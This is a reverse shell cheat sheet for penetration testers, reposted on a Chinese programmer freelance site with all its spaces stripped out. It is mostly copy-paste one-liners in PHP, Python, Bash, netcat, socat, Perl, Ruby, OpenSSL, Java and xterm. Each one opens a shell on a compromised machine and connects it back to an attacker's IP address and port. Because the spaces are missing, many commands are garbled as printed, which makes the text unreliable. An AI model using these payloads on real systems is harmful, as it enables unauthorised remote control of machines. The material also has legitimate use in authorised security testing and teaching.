reverse-shell-cheatsheet_开源项目-程序员客栈

ReverseShellCheatSheet

Ifyou’reluckyenoughtofindacommandexecutionvulnerabilityduringapenetrationtest,prettysoonafterwardsyou’llprobablywantaninteractiveshell.

Ifit’snotpossibletoaddanewaccount/SSHkey/.rhostsfileandjustlogin,yournextstepislikelytobeeithertrowingbackareverseshellorbindingashelltoaTCPport.Thispagedealswiththeformer.

Youroptionsforcreatingareverseshellarelimitedbythescriptinglanguagesinstalledonthetargetsystem–thoughyoucouldprobablyuploadabinaryprogramtooifyou’resuitablywellprepared.

TheexamplesshownaretailoredtoUnix-likesystems.SomeoftheexamplesbelowshouldalsoworkonWindowsifyouusesubstitute“/bin/sh-i”with“cmd.exe”.

Eachofthemethodsbelowisaimedtobeaone-linerthatyoucancopy/paste.Assuchthey’requiteshortlines,butnotveryreadable.

Php:php-r'$sock=fsockopen("192.168.0.5",4444);exec("/bin/sh-i<&3>&32>&3");'Python:python-c'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'Bash:bash-i>&/dev/tcp/192.168.0.1/80800>&1Netcat:nc-e/bin/sh192.168.0.54444Socat:socattcp-connect:192.168.0.5:4444system:/bin/shPerl:perl-e'useSocket;$i="192.168.0.5";$p=4545;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh-i");};'Ruby:ruby-rsocket-e'f=TCPSocket.open("192.168.0.5",4444).to_i;execsprintf("/bin/sh-i<&%d>&%d2>&%d",f,f,f)'OpenSSL:

Onyourmachine(toreceive,notanormalTCPconnection)

opensslreq-x509-newkeyrsa:4096-keyoutkey.pem-outcert.pem-days365-nodes#generatesomearbitrarycertopenssls_server-quiet-keykey.pem-certcert.pem-port4444

OnPWN'dclient

mkfifo/tmp/s;/bin/sh-i</tmp/s2>&1|openssls_client-quiet-connect192.168.0.5:4444>/tmp/s;rm/tmp/sJava:r=Runtime.getRuntime()p=r.exec(["/bin/bash","-c","exec5<>/dev/tcp/192.168.0.5/4444;cat<&5|whilereadline;do\$line2>&5>&5;done"]asString[])p.waitFor()xterm:xterm-display192.168.0.5:4444

reverse-shell-cheatsheet开源项目

作品详情

重点城市程序员兼职推荐

重点岗位程序员兼职推荐